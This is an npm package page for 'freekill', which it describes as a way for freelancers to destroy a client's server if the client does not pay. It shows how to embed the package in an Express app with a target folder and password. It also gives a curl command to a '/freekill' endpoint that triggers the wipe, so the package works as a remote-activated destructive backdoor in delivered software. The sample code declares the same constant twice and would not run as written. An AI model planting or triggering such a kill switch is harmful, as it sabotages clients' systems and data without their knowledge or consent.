freekill

1.0.3 • Public • Published

freekill

FreeKill is a project that can be easily installed that allows freelancers to kill a server if a client is not paying.

Install

npm i freekill

How to use

In your server add

const freekill = require('freekill');
const express = require("express");
const app = express();
const http = require("http").Server(app);
const freekill = require('freekill');
...
freekill("/project", "password", app);
...

http.listen(8080, ()=>{
  console.log('Server is running');
});

The syntax for freekill is simple

freekill(path_to_folder, password, express_app);

How to activate

curl SERVER_URL.com/freekill?pwd=YOUR_PASSWORD

Dependencies (0)

    Dev Dependencies (0)

      Package Sidebar

      Install

      npm i freekill

      Weekly Downloads

      0

      Version

      1.0.3

      License

      MIT

      Unpacked Size

      1.28 kB

      Total Files

      3

      Last publish

      Collaborators

      • m-a-s-o-n